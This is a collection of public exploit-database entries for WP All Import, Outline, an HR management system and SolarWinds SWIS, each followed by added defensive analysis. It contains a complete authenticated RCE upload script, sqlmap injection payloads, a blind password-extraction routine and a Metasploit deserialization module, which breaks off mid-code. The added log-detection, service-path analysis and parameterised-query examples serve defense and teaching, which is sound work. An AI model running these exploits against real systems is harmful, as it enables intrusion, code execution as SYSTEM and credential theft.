<pre><code># Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)<br /># Date: 11/05/2022<br /># Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)<br /># Vendor Homepage: https://www.wpallimport.com/<br /># Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version)<br /># Version: <= 3.6.7 (tested: 3.6.7)<br /># Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload)<br /># CVE: CVE-2022-1565<br /><br />#!/usr/bin/python<br />import requests<br />import re<br />import os<br /><br /># WARNING: This exploit does NOT include the payload.<br /># Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work.<br /># If a file with the same name as the payload is already on the server, the upload will OVERWRITE it<br /># <br /># Please notice that I'm NOT the researcher who found this vulnerability<br /><br /># # # # # VULNERABILITY DESCRIPTION # # # # #<br /># The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. <br /># This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. <br /><br /># # # # # HOW THE EXPLOIT WORKS # # # # #<br /># 1. Prepare the zip file:<br /># - create a PHP file with your payload (e.g. reverse shell)<br /># - set the variable "payload_file_name" with the name of this file (e.g. "shell.php")<br /># - create a zip file with the payload<br /># - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip")<br />#<br /># 2. 
Login using an administrator account:<br /># - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /)<br /># - set the variable "admin_user" with the username of an administrator account<br /># - set the variable "admin_pass" with the password of an administrator account<br />#<br /># 3. Get the wpnonce using the get_wpnonce_upload_file() method<br /># - there are actually 2 types of wpnonce:<br /># - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class.<br /># This wpnonce allows us to change the plugin settings (check the step 4)<br /># - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class.<br /># This wpnonce allows us to upload the file<br /># <br /># 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class<br /># - if the Secure Mode is enabled, the zip content will be put in a folder with a random name.<br /># The exploit will disable the Secure Mode.<br /># By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url).<br /># The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str)<br /># - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode.<br />#<br /># 5. 
Upload the file using the upload_file(wpnonce_upload_file: str) method<br /># - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully.<br /># The response will contain a JSON that looks like this:<br /># {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"}<br /># As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed<br />#<br /># 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method<br />#<br /># 7. Activate the payload using the activate_payload() method<br /># - you can define a method to activate the payload.<br /># The reason behind this choice is that this exploit does NOT provide any payload.<br /># Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of an HTTP GET request, or you may want to pass parameters<br /><br /># # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # #<br /># According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "Managed Imports page"<br /># I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?)<br /># I had to find a workaround and so I did, by exploiting this option.<br /># WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7<br /><br /># # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # #<br /># In order for the exploit to work please consider the following:<br /># 1. check the target_url and the admin credentials<br /># 2. check the path of the zip file and the name of the payload (they can be different)<br /># 3. if you're testing locally, try to set verify_ssl_certificate to False<br /># 4. 
you can use print_response(http_response) to investigate further<br /><br /># Configure the following variables:<br />target_url = "https://vulnerable.wp/wordpress" # Target base URL<br />admin_user = "admin" # Administrator username<br />admin_pass = "password" # Administrator password<br />zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g. /root/shell.zip)<br />payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell)<br />verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it to False while testing locally, if needed.<br /><br /># Do NOT change the following variables<br />wp_login_url = target_url + "/wp-login.php" # WordPress login page<br />wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings<br />payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here<br />re_enable_secure_mode = False<br />session = requests.Session()<br />session.verify = verify_ssl_certificate # Apply the certificate check setting to every request made through the session<br /><br /># This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files.<br />class PluginSetting:<br />    # Regular Expression patterns<br />    pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>'<br />    pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>'<br />    pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};'<br />    http_response: requests.Response<br />    is_secure_mode_enabled: bool<br />    wpnonce_edit_settings: str<br />    wpnonce_upload_file: str<br /><br />    def __init__(self, http_response: requests.Response):<br />        self.http_response = http_response<br />        self.check_if_secure_mode_is_enabled()<br />        self.retrieve_wpnonce_edit_settings()<br />        self.retrieve_wpnonce_upload_file()<br /><br />    def check_if_secure_mode_is_enabled(self):<br />        # To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked<br />        # <input type="checkbox" value="1" id="secure" name="secure" checked="checked"><br />        regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text)<br />        if not regex_search:<br />            print("Something went wrong: could not retrieve plugin settings. Are you an administrator?")<br />            # print_response(self.http_response) # for debugging<br />            exit()<br />        self.is_secure_mode_enabled = "checked" in regex_search.group()<br /><br />    def retrieve_wpnonce_edit_settings(self):<br />        # You can find this wpnonce in the source file by searching for the following input hidden:<br />        # <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9"><br />        # 052e2438f9 would be the wpnonce for editing the settings<br />        regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text)<br />        if not regex_search:<br />            print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?")<br />            # print_response(self.http_response) # for debugging<br />            exit()<br /><br />        self.wpnonce_edit_settings = regex_search.group(1)<br /><br />    def retrieve_wpnonce_upload_file(self):<br />        # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b';<br />        # dee75fdb8b would be the wpnonce for the upload<br />        regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text)<br />        if not regex_search:<br />            print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable")<br />            # print_response(self.http_response) # for debugging<br />            exit()<br /><br />        self.wpnonce_upload_file = regex_search.group(1)<br /><br />def wp_login():<br />    global session<br />    data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 }<br />    login_cookie = { "wordpress_test_cookie" : "WP Cookie check" }<br /><br />    # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found.<br />    # Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not<br />    print("Trying to login...")<br />    response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate)<br /><br />    if response.status_code == 302:<br />        print("Logged in successfully!")<br />        return<br /><br />    # print_response(response) # for debugging<br />    print("Login failed. If the credentials are correct, try to print the response to investigate further.")<br />    exit()<br /><br />def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response:<br />    global session<br />    if set_to_enabled:<br />        print("Enabling secure mode...")<br />    else:<br />        print("Disabling secure mode...")<br /><br />    print("Edit settings wpnonce value: " + wpnonce)<br />    data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 }<br />    response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate)<br /><br />    if response.status_code == 403:<br />        print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?")<br />        # print_response(response) # for debugging<br />        exit()<br />    return response<br /><br />def switch_back_to_secure_mode():<br />    global session<br /><br />    print("Re-enabling secure mode...")<br />    response = session.get(url=wp_all_import_page_settings)<br />    plugin_setting = PluginSetting(response)<br /><br />    if plugin_setting.is_secure_mode_enabled:<br />        print("Secure mode is already enabled")<br />        return<br /><br />    response = set_plugin_secure_mode(set_to_enabled=True, wpnonce=plugin_setting.wpnonce_edit_settings)<br />    new_plugin_setting = PluginSetting(response)<br />    if not new_plugin_setting.is_secure_mode_enabled:<br />        print("Something went wrong: secure mode has not been re-enabled")<br />        # print_response(response) # for debugging<br />        exit()<br />    print("Secure mode has been re-enabled!")<br /><br />def get_wpnonce_upload_file() -> str:<br />    global session, re_enable_secure_mode<br />    # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload<br />    # If Secure Mode is already disabled, it just returns the wpnonce for the upload<br /><br />    print("Checking if secure mode is enabled...")<br />    response = session.get(url=wp_all_import_page_settings)<br />    plugin_setting = PluginSetting(response)<br /><br />    if not plugin_setting.is_secure_mode_enabled:<br />        re_enable_secure_mode = False<br />        print("Secure mode is already disabled!")<br />        return plugin_setting.wpnonce_upload_file<br /><br />    print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.")<br />    response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings)<br /><br />    new_plugin_setting = PluginSetting(response)<br /><br />    if new_plugin_setting.is_secure_mode_enabled:<br />        print("Something went wrong: secure mode has not been disabled")<br />        # print_response(response) # for debugging<br />        exit()<br /><br />    print("Secure mode has been disabled!")<br />    re_enable_secure_mode = True<br />    return new_plugin_setting.wpnonce_upload_file<br /><br />def upload_file(wpnonce_upload_file: str):<br />    global session<br /><br />    print("Uploading file...")<br />    print("Upload wpnonce value: " + wpnonce_upload_file)<br /><br />    zip_file_name = os.path.basename(zip_file_to_upload)<br />    upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file<br />    data = { "name" : zip_file_name }<br />    with open(zip_file_to_upload, 'rb') as zip_file:<br />        files = { "async-upload" : (zip_file_name, zip_file) }<br />        response = session.post(url=upload_url, files=files, data=data)<br /><br />    if response.status_code == 200:<br />        print("Server replied with HTTP 200 OK. The upload should be completed.")<br />        print("Payload should be here: " + payload_url)<br />        print("If you can't find the payload at this URL, try to print the response to investigate further")<br />        # print_response(response) # for debugging<br />        return 1<br />    else:<br />        print("Something went wrong during the upload. Try to print the response to investigate further")<br />        # print_response(response) # for debugging<br />        return 0<br /><br />def activate_payload():<br />    global session<br /><br />    print("Activating payload...")<br />    response = session.get(url=payload_url)<br /><br />    if response.status_code != 200:<br />        print("Something went wrong: could not find payload at " + payload_url)<br />        # print_response(response) # for debugging<br />        return<br /><br />def print_response(response:requests.Response):<br />    print(response.status_code)<br />    print(response.text)<br /><br /># Entry Point<br />def Main():<br />    print("Target: " + target_url)<br />    print("Credentials: " + admin_user + ":" + admin_pass)<br /><br />    # Do the login<br />    wp_login()<br /><br />    # Retrieve wpnonce for upload.<br />    # It disables Secure Mode if needed, then returns the wpnonce<br />    wpnonce_upload_file = get_wpnonce_upload_file()<br /><br />    # Upload the file<br />    file_uploaded = upload_file(wpnonce_upload_file)<br /><br />    # Re-enable Secure Mode if needed<br />    if re_enable_secure_mode:<br />        switch_back_to_secure_mode()<br /><br />    # Activate the payload<br />    if file_uploaded:<br />        activate_payload()<br /><br />Main()<br /></code></pre>
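The exploit above leaves a distinctive trail in the web server's access log: a POST to the plugin's settings page with `action=upload`, followed by a request for a `.php` file under `/wp-content/uploads/wpallimport/uploads/`. The following detection logic is an added example written for this page, not code from the exploit author or from WP All Import. The log lines are constructed in Apache combined format to mirror that request sequence, and the nonce and IP addresses in them are made up. Note that the upload response is HTTP 200 even when the JSON body reports error 102, so the rule keys on the request rather than the status code.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (Apache "combined" format) mirroring the request
# sequence the exploit produces; these lines are made up for this example.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [11/Nov/2022:10:01:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.28.1"
10.0.0.5 - - [11/Nov/2022:10:01:03 +0000] "GET /wordpress/wp-admin/admin.php?page=pmxi-admin-settings HTTP/1.1" 200 41233 "-" "python-requests/2.28.1"
10.0.0.5 - - [11/Nov/2022:10:01:04 +0000] "POST /wordpress/wp-admin/admin.php?page=pmxi-admin-settings&action=upload&_wpnonce=a1b2c3d4e5 HTTP/1.1" 200 131 "-" "python-requests/2.28.1"
10.0.0.5 - - [11/Nov/2022:10:01:05 +0000] "GET /wordpress/wp-content/uploads/wpallimport/uploads/shell.php HTTP/1.1" 200 88 "-" "python-requests/2.28.1"
192.0.2.9 - - [11/Nov/2022:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2022/11/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Upload directory and endpoint named in the exploit above.
WPAI_UPLOAD_DIR = "/wp-content/uploads/wpallimport/uploads/"
SERVER_SCRIPT = re.compile(r"\.ph(?:p\d*|tml|ar)$", re.IGNORECASE)


def classify(method, target):
    """Label one request: the plugin's upload endpoint, or a script fetched from its upload directory."""
    url = urlsplit(target)
    query = parse_qs(url.query)
    if (method == "POST"
            and url.path.endswith("/wp-admin/admin.php")
            and query.get("page") == ["pmxi-admin-settings"]
            and query.get("action") == ["upload"]):
        return "wpallimport_upload"
    if WPAI_UPLOAD_DIR in url.path and SERVER_SCRIPT.search(url.path):
        return "script_requested_from_upload_dir"
    return None


def scan_access_log(text):
    """Return the suspicious requests found in an access log, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        kind = classify(m["method"], m["target"])
        if kind:
            findings.append({"ip": m["ip"], "ts": m["ts"], "kind": kind,
                             "target": m["target"], "status": int(m["status"])})
    return findings


def correlate(findings):
    """Client IPs that used the upload endpoint and afterwards fetched a script from the upload directory."""
    uploaders, confirmed = set(), set()
    for f in findings:
        if f["kind"] == "wpallimport_upload":
            uploaders.add(f["ip"])
        elif f["kind"] == "script_requested_from_upload_dir" and f["ip"] in uploaders:
            confirmed.add(f["ip"])
    return confirmed


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_ACCESS_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['kind']}: {f['target']} ({f['status']})")
    print("upload followed by script execution from:", sorted(correlate(found)))
```

Any hit on `script_requested_from_upload_dir` is worth triage on its own, since nothing legitimate should serve PHP out of that directory; the correlation step just ranks the obvious cases first. The usual hardening that makes the second request harmless regardless of the plugin is a web server rule that refuses to execute scripts anywhere under `wp-content/uploads`.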
<pre><code># Exploit Title: Outline V1.6.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Discovery Date: 2022-11-10<br /># Vendor Homepage: https://getoutline.org/<br /># Software Link: https://getoutline.org/<br /># Tested Version: V1.6.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows 11 Enterprise<br /># Steps to discover the Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe Auto<br /><br />C:\>sc qc OutlineService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: OutlineService<br />        TYPE               : 10  WIN32_OWN_PROCESS<br />        START_TYPE         : 2   AUTO_START<br />        ERROR_CONTROL      : 1   NORMAL<br />        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe<br />        LOAD_ORDER_GROUP   :<br />        TAG                : 0<br />        DISPLAY_NAME       : OutlineService<br />        DEPENDENCIES       :<br />        SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />OS Name: Microsoft Windows 11 Enterprise<br />OS Version: 10.0.22000 N/A Build 22000<br />OS Manufacturer: Microsoft Corporation<br /><br /></code></pre>
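The `wmic` and `sc qc` output above only shows that the path is unquoted; it does not say which files Windows would actually try before reaching `OutlineService.exe`. The block below is an added example, not part of the advisory, that reproduces the documented `CreateProcess` rule for unquoted paths (the text up to each space is tried as the module name, with `.exe` appended when it has no extension) and derives the directories an attacker would need write access to. Only the `BINARY_PATH_NAME` string is taken from the page; the function names are this example's own.

```python
import ntpath
import re

# BINARY_PATH_NAME from the sc qc output above; everything else in this block is an added example.
OUTLINE_SERVICE_PATH = r"C:\Program Files (x86)\Outline\OutlineService.exe"


def image_path(binary_path_name):
    """Return the image path part of an unquoted BINARY_PATH_NAME (up to the first '.exe' token),
    dropping any service arguments that follow it."""
    text = binary_path_name.strip()
    m = re.match(r"(?i)(.*?\.exe)(?=\s|$)", text)
    return m.group(1) if m else text


def hijack_candidates(binary_path_name):
    """Files CreateProcess tries, in order, for an unquoted path with spaces (documented behaviour):
    the text up to each space is tried as the module name, with '.exe' appended when it has no
    extension, and the first file that exists is what the service runs."""
    text = binary_path_name.strip()
    if text.startswith('"'):
        return []  # a quoted path is unambiguous; nothing to hijack
    parts = image_path(text).split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return candidates


def planting_points(binary_path_name):
    """Directories an attacker must be able to write to in order to plant one of the bogus
    candidates (every candidate except the genuine binary), without duplicates."""
    dirs = []
    for candidate in hijack_candidates(binary_path_name)[:-1]:
        d = ntpath.dirname(candidate)
        if d not in dirs:
            dirs.append(d)
    return dirs


def is_unquoted_service_path(binary_path_name):
    """Offline equivalent of the wmic filter above: unquoted, contains a space in the image path,
    and not under C:\\Windows (the auto-start filter is applied by the caller)."""
    text = binary_path_name.strip()
    if text.startswith('"'):
        return False
    image = image_path(text)
    return " " in image and not image.lower().startswith("c:\\windows\\")


if __name__ == "__main__":
    print("unquoted and worth checking:", is_unquoted_service_path(OUTLINE_SERVICE_PATH))
    for candidate in hijack_candidates(OUTLINE_SERVICE_PATH):
        print("CreateProcess tries:", candidate)
    print("needs write access to:", planting_points(OUTLINE_SERVICE_PATH))
```

For the Outline path both bogus candidates (`C:\Program.exe` and `C:\Program Files.exe`) live directly under `C:\`, where a default installation does not let standard users create files. The finding is therefore only exploitable for privilege escalation where the ACL on that directory has been loosened, which is the check to run before reporting it as such.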
<pre><code># Exploit Title: Human Resource Management System - SQL Injection (unauthenticated)<br /># Date: 08-11-2022<br /># Exploit Author: Matthijs van der Vaart (eMVee)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip<br /># Version: 1.0 (Monday, October 10, 2022 - 13:37)<br /># Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0<br /><br />1) Capture the login POST request with Burp Suite or OWASP ZAP<br />2) Save the request as "login.req"<br />3) Run sqlmap as follows: "sqlmap -r login.req"<br /><br />Example login.req<br /><br />==========<br /><br />POST /controller/login.php HTTP/1.1<br />Host: target<br />Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 66<br />Origin: https://target<br />Referer: https://target/index.php<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br />Connection: close<br /><br />name=admin%40gmail.com&password=password+&submit=Sign+In<br /><br />=========<br /><br />Example sqlmap output against the unauthenticated login page<br /><br />==========<br /><br />POST parameter 'password' is vulnerable. 
Do you want to keep testing the others (if any)? [y/N] n<br /><br />sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests:<br /><br />---<br /><br />Parameter: password (POST)<br /><br />Type: boolean-based blind<br /><br />Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /><br />Payload: name=admin@gmail.com&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In<br /><br />Type: error-based<br /><br />Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /><br />Payload: name=admin@gmail.com&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In<br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: name=admin@gmail.com&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In<br /><br />Parameter: name (POST)<br /><br />Type: boolean-based blind<br /><br />Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /><br />Payload: name=admin@gmail.com' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In<br /><br />Type: error-based<br /><br />Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /><br />Payload: name=admin@gmail.com' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In<br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: name=admin@gmail.com' AND (SELECT 8912 FROM 
(SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In<br /><br />---<br /><br />there were multiple injection points, please select the one to use for following injections:<br /><br />[0] place: POST, parameter: name, type: Single quoted string (default)<br /><br />[1] place: POST, parameter: password, type: Single quoted string<br /><br />==========<br /><br /></code></pre>
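The sqlmap output above reports boolean-based blind injection in both login fields, with payloads of the form `value' AND (condition)-- xxxx`. The block below is an added example, not code from the HRM application or from the advisory's author: it stands in for the vulnerable login query with an in-memory SQLite database (the real application is MySQL, so the MySQL-specific `RLIKE`, `FLOOR(RAND())` and `SLEEP()` payloads are not reproduced), shows the parameterised form that closes the hole, and walks through how a boolean oracle recovers the stored password one character at a time. The account, password and table layout are constructed for the demo; the real application's schema is not known from the page.

```python
import sqlite3
import string


def create_demo_db():
    """Constructed stand-in for the HRM user table (SQLite, in memory). The password is stored in
    plaintext only to keep the demonstration short; the extraction loop works the same on a hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, password TEXT NOT NULL)")
    conn.execute("INSERT INTO users (name, password) VALUES (?, ?)", ("admin@gmail.com", "correct-horse"))
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """String-built query: both fields are injectable, which is what sqlmap reported above."""
    sql = f"SELECT id FROM users WHERE name = '{name}' AND password = '{password}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, name, password):
    """Same query with bound parameters: the input is data, never part of the SQL text."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def oracle(conn, condition):
    """Boolean-based blind primitive: does the login succeed when `condition` is ANDed into the
    WHERE clause? The trailing '-- ' comments out the password check, as in the sqlmap payloads."""
    return login_vulnerable(conn, f"admin@gmail.com' AND ({condition})-- ", "anything")


def extract_password(conn, max_len=64):
    """Recover the admin password through the oracle: first its length, then each character."""
    length = next(n for n in range(1, max_len + 1) if oracle(conn, f"length(password) = {n}"))
    recovered = ""
    for pos in range(1, length + 1):
        for ch in string.printable.strip():
            if ch in "'\\":  # characters that would break the injection string itself
                continue
            if oracle(conn, f"substr(password, {pos}, 1) = '{ch}'"):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = create_demo_db()
    print("bypass with ' OR 1=1-- :", login_vulnerable(db, "admin@gmail.com' OR 1=1-- ", "wrong"))
    print("same input, parameterised:", login_parameterized(db, "admin@gmail.com' OR 1=1-- ", "wrong"))
    print("password recovered blind:", extract_password(db))
```

The extraction loop issues roughly one query per candidate character per position, which is why sqlmap's run above needed 1143 requests; the error-based technique it also found returns data in a single response and is what it would prefer on MySQL.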
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'rex/proto/amqp/version_0_9_1'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> def initialize<br /> super(<br /> 'Name' => 'SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE',<br /> 'Description' => %q{<br /> The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the<br /> AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted<br /> message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\SYSTEM.<br /> },<br /> 'Author' => [<br /> 'Justin Hong', # vulnerability research, Trend Micro<br /> 'Lucas Miller', # vulnerability research, Trend Micro<br /> 'Piotr Bazydło', # vulnerability discovery, reported to ZDI<br /> 'Spencer McIntyre' # metasploit module<br /> ],<br /> 'Arch' => ARCH_CMD,<br /> 'Platform' => 'win',<br /> 'References' => [<br /> [ 'CVE', '2022-38108' ],<br /> [ 'URL', 'https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor' ],<br /> [ 'URL', 'https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108' ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 10<br /> },<br /> 'Targets' => [<br /> [ 'Automatic', {} ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2022-10-19',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /><br /> register_options([<br /> Opt::RHOST,<br /> Opt::RPORT(5671),<br /> OptString.new('USERNAME', [true, 'The username to authenticate with', 'orion']),<br /> OptString.new('PASSWORD', [true, 'The password to 
authenticate with', ''])<br /> ])<br /><br /> register_advanced_options(<br /> [<br /> OptBool.new('SSL', [ true, 'Negotiate SSL/TLS for outgoing connections', true ]),<br /> Opt::SSLVersion<br /> ]<br /> )<br /> end<br /><br /> def peer<br /> rhost = datastore['RHOST']<br /> rport = datastore['RPORT']<br /> if Rex::Socket.is_ipv6?(rhost)<br /> "[#{rhost}]:#{rport}"<br /> else<br /> "#{rhost}:#{rport}"<br /> end<br /> end<br /><br /> def print_status(msg)<br /> msg = "#{peer} - #{msg}"<br /> super<br /> end<br /><br /> def exploit<br /> amqp_client = Rex::Proto::Amqp::Version091::Client.new(<br /> datastore['RHOST'],<br /> port: datastore['RPORT'],<br /> context: { 'Msf' => framework, 'MsfExploit' => self },<br /> ssl: datastore['SSL'],<br /> ssl_version: datastore['SSLVersion']<br /> )<br /><br /> unless amqp_client.login(datastore['USERNAME'], datastore['PASSWORD'])<br /> fail_with(Failure::NoAccess, "Authentication failed for user #{datastore['USERNAME']}.")<br /> end<br /> print_status('Successfully connected to the remote server.')<br /><br /> channel = amqp_client.channel_open<br /> vprint_status('Successfully opened a new channel.')<br /> channel.basic_publish(<br /> routing_key: 'SwisPubSub',<br /> message: ::Msf::Util::DotNetDeserialization.generate(<br /> payload.encoded,<br /> gadget_chain: :ObjectDataProvider,<br /> formatter: :JsonNetFormatter<br /> ),<br /> properties: {<br /> message_type: 'System.Windows.Data.ObjectDataProvider'<br /> }<br /> )<br /> print_status('Successfully published the message to the channel.')<br /><br /> channel.close<br /> amqp_client.connection_close<br /> rescue Rex::Proto::Amqp::Error::UnexpectedReplyError => e<br /> fail_with(Failure::UnexpectedReply, e.message)<br 